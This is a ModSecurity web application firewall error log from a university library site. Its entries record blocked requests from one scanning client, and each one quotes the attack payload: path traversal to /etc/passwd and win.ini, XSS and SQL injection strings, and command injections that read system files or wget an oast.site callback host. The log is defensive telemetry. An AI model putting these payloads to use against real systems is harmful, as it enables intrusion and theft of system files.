[Tue Aug 29 11:44:13.483322 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:IO.popen('cat /etc/passwd').read\\n#. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:IO.popen('cat /etc/passwd').read\\x5cn#: io.popen(cat/etc/passwd).read #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO13ncCo-f0AAAcsLRUAAAAE"]
[Tue Aug 29 11:44:14.417307 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:username: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13nsCo-f0AAAdQ3poAAAAV"]
[Tue Aug 29 11:44:16.466476 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmnbitjmimt14dgn26g88joxic6r9nyn.oast.site found within TX:1: cjmnbitjmimt14dgn26g88joxic6r9nyn.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/idp/profile/oidc/authorize"] [unique_id "ZO13oMCo-f0AAAcsLR8AAAAE"]
[Tue Aug 29 11:44:19.439433 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:fileName: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/api/downloads"] [unique_id "ZO13o8Co-f0AAAdOeaIAAAAS"]
[Tue Aug 29 11:44:20.367832 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:defaultFilter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:defaultFilter: e');var require=global.require || global.process.mainModule.constructor._load; require('child_process').exec('wget http:/cjmnbitjmimt14dgn26gubp3u18m5q7dm.oast.site');/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO13pMCo-f0AAAeChjkAAAAw"]
[Tue Aug 29 11:44:23.564833 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{"jsonrpc":"2.0","id":3,"method":"call","params":["4183f72884a98d7952d953dd9439a1d1","file","read",{"path":"/etc/passwd"}]}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x22jsonrpc\\x22:\\x222.0\\x22,\\x22id\\x22:3,\\x22method\\x22:\\x22call\\x22,\\x22params\\x22:[\\x224183f72884a98d7952d953dd9439a1d1\\x22,\\x22file\\x22,\\x22read\\x22,{\\x22path\\x22:\\x22/etc/passwd\\x22}]}: {jsonrpc:2.0 id:3 method:call params:[4183f72884a98d7952d953dd9439a1d1 file read {path:/etc/passwd}]}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/ubus/"] [unique_id "ZO13p8Co-f0AAAdftiAAAAAG"]
[Tue Aug 29 11:44:26.404967 2023] [:error] [pid 2029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:k. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:k: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/blogroll-fun/blogroll.php"] [unique_id "ZO13qsCo-f0AAAftVFQAAAAf"]
[Tue Aug 29 11:44:27.398260 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13q8Co-f0AAAdQ3rMAAAAV"]
[Tue Aug 29 11:44:29.450831 2023] [:error] [pid 2009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:link. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:link: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO13rcCo-f0AAAfZj5cAAAAN"]
[Tue Aug 29 11:44:32.413455 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/download.php"] [unique_id "ZO13sMCo-f0AAAdftjEAAAAG"]
[Tue Aug 29 11:44:35.394542 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ())\\x09 found within ARGS:q: ')\\x09UNION\\x09SELECT\\x09*\\x09FROM\\x09(SELECT\\x09null)\\x09AS\\x09a1\\x09\\x09JOIN\\x09(SELECT\\x091)\\x09as\\x09u\\x09JOIN\\x09(SELECT\\x09user())\\x09AS\\x09b1\\x09JOIN\\x09(SELECT\\x09user())\\x09AS\\x09b2\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a3\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a4\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a5\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a6\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a7\\x09\\x09JOIN\\x09(SELECT\\x09null)\\x09as\\x09a8\\x09\\x09JOIN\\x09..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/api/v1/repos/search"] [unique_id "ZO13s8Co-f0AAAhBR@0AAAAX"]
[Tue Aug 29 11:44:36.434268 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gdmgm7bn5ow64m.oast.site found within TX:1: cjmnbitjmimt14dgn26gdmgm7bn5ow64m.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/composer/send_email"] [unique_id "ZO13tMCo-f0AAAe3@EQAAAAA"]
[Tue Aug 29 11:44:43.515003 2023] [:error] [pid 2005] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/mypixs/mypixs/downloadpage.php"] [unique_id "ZO13u8Co-f0AAAfVkdcAAAAD"]
[Tue Aug 29 11:44:44.380187 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:name: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/jnoj/web/polygon/problem/viewfile"] [unique_id "ZO13vMCo-f0AAAe3@FYAAAAA"]
[Tue Aug 29 11:44:47.623612 2023] [:error] [pid 2124] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:File. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:File: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/spreadsheet-reader/test.php"] [unique_id "ZO13v8Co-f0AAAhMtTcAAAAM"]
[Tue Aug 29 11:44:47.748769 2023] [:error] [pid 2009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"username":"admin","password":"public"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS_NAMES:{\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22public\\x22}: {\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22public\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/api/v4/auth"] [unique_id "ZO13v8Co-f0AAAfZj8YAAAAN"]
[Tue Aug 29 11:44:48.386049 2023] [:error] [pid 2005] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:code: ../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/plus/carbuyaction.php"] [unique_id "ZO13wMCo-f0AAAfVkfkAAAAD"]
[Tue Aug 29 11:44:48.488496 2023] [:error] [pid 2111] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:File. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:File: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/nuovo/spreadsheet-reader/test.php"] [unique_id "ZO13wMCo-f0AAAg-pKsAAAAR"]
[Tue Aug 29 11:44:50.439119 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:redirect: ../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO13wsCo-f0AAAc4E1MAAAAP"]
[Tue Aug 29 11:44:51.360573 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:page: ../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO13w8Co-f0AAAdQ3uAAAAAV"]
[Tue Aug 29 11:44:51.506849 2023] [:error] [pid 2009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13w8Co-f0AAAfZj9IAAAAN"]
[Tue Aug 29 11:44:52.490394 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:url: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO13xMCo-f0AAAfGaf4AAAAT"]
[Tue Aug 29 11:44:53.474465 2023] [:error] [pid 2120] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fullPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fullPath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/fileDownload"] [unique_id "ZO13xcCo-f0AAAhISPcAAAAH"]
[Tue Aug 29 11:44:56.608946 2023] [:error] [pid 2011] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:files[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:files[]: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php"] [unique_id "ZO13yMCo-f0AAAfbkuYAAAAZ"]
[Tue Aug 29 11:44:58.874748 2023] [:error] [pid 2143] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:page: windows/win.ini\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13ysCo-f0AAAhfdm8AAAAa"]
[Tue Aug 29 11:44:59.650003 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:page: ../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13y8Co-f0AAAdQ3xkAAAAV"]
[Tue Aug 29 11:45:00.528965 2023] [:error] [pid 2143] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:filePath: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/portal/attachment_downloadByUrlAtt.action"] [unique_id "ZO13zMCo-f0AAAhfdngAAAAa"]
[Tue Aug 29 11:45:01.360484 2023] [:error] [pid 2162] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....// found within ARGS:page: ....//....//windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13zcCo-f0AAAhyKV8AAAAw"]
[Tue Aug 29 11:45:02.428128 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:view: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13zsCo-f0AAAhrqGAAAAAo"]
[Tue Aug 29 11:45:03.397666 2023] [:error] [pid 2150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:page: etc/passwd\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13z8Co-f0AAAhmFPsAAAAj"]
[Tue Aug 29 11:45:04.418643 2023] [:error] [pid 2159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:page: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO130MCo-f0AAAhvjU4AAAAs"]
[Tue Aug 29 11:45:05.354408 2023] [:error] [pid 2153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:student_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:student_id: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/TransferredOutModal.php"] [unique_id "ZO130cCo-f0AAAhpwOgAAAAm"]
[Tue Aug 29 11:45:05.356445 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....// found within ARGS:page: ....//....//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO130cCo-f0AAAhlz3gAAAAi"]
